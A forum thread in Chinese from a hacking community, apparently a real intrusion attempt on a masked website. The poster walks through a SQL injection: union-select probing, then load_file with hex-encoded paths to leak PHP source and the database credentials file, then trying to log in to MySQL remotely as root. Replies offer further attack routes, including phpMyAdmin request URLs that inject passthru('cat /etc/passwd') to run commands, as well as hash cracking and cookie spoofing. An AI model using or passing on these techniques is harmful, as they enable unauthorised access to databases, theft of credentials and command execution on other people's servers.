议题作者：Randy[B.S.F]
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

直接开门见说的提问了.大家谅解哦!
http://www.xxx.com/l/show.php?id=44725 and 1=1 正常
http://www.xxx.com/l/show.php?id=44725 and 1=2 不正常
http://www.xxx.com/l/show.php?id=44725 and 1=2 select union 1 不正常
中间省略N多
http://www.xxx.com/l/show.php?id=44725 and 1=2 select union 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 正常
紧张的使用load_file语句.由于是linux系统.一个'绝对路径就出来了.
/usr/httpd/xxx/l/show.php
把/usr/httpd/xxx/l/show.php 转换成16进制.
0x2F7573722F68747470642F677A636974792F6C2F73686F772E706870
然后提交
http://www.xxx.com/l/show.php?id ... 0union%20select%201,2,3,4,5,6,load_file(0x2F7573722F68747470642F677A636974792F6C2F73686F772E706870),8,9,10,11,12,13,14,15,16,17
show.php的源码漏出来了.看了php文件头.  
<?
session_start();
include "../include/dbconn.inc.php";
不用说了吧.数据库连接文件.紧张的在DOS窗口执行telnet www.xxx.com 3306
顺利连接.松了一大口气.接着提交
http://www.xxx.com/l/show.php?id ... 0union%20select%201,2,3,4,5,6,load_file(0x2F7573722F68747470642F677A636974792F696E636C7564652F6462636F6E6E2E696E632E706870),8,9,10,11,12,13,14,15,16,17
数据库帐号密码展现在我眼前.狂喜.拿着Maestro连接mysql.接着麻烦来了.Maestro提示
Access denied for user:&#39;root@xxx.com.tw&#39;(using password:YES)
直接晕倒.密码不可能错误.难道是限制IP.最后到了这里我就停了.由于unix系统.了解的不多.希望大家讨论下思路.还有别的办法.比如从FTP入手等等.这里谢谢大家了! [s:66]

不允许远程连接  [s:81]

管理员禁止了root的远程登陆,这种情况没什么好办法了，换个思路吧！

看下网站上有没phpmyadmin，有的话拿root试试

linux一般没的搞。  看看有没有file权限  拿个webshell 提升权限应该不太可能。
腾讯有几个数据库服务器 都是root空密码  但是内网没的搞。

听说php可以用../../../遍厉目录. 难道用这个办法摸索phpmyadmin?? 苦死我咯! [s:43]

问题提的好,我也遇到过惊人类似的情况,我的情况是对方没装phpmyadmin,上面有个ofstar论坛,但不让注册,尽管拿到了admin的md5散列,破不出来.要是能让我进后台就好了,不过不知道ofstar能不能cookie欺骗进后台,望高手指点一下.

要是有phpmyadmin的话，先创建一个表，
http://victim/phpmyadmin/tbl_cre ... uery=dummy+integer+
primary+key+auto_increment&submit=1
然后

http://victim/phpmyadmin/tbl_cop ... me=test.haxor2&
strCopyTableOK=".passthru(&#39;cat%20/etc/passwd&#39;)."
这样就可以执行命令了，不过这里执行的身份是http一般都是nobody的拉。

有一个判断方法，你telnet3306看看，一般不容许远程连接的话会提示：”不容许你的ip连接“这样类似的语句，如果没提示，就是说容许有的用户连接，但一般不是root，因为root在安装数据库建立的时候，不特别设置，默认都拒绝远程连接

看下有没有phpmyadmin，有的话通过这个搞！！！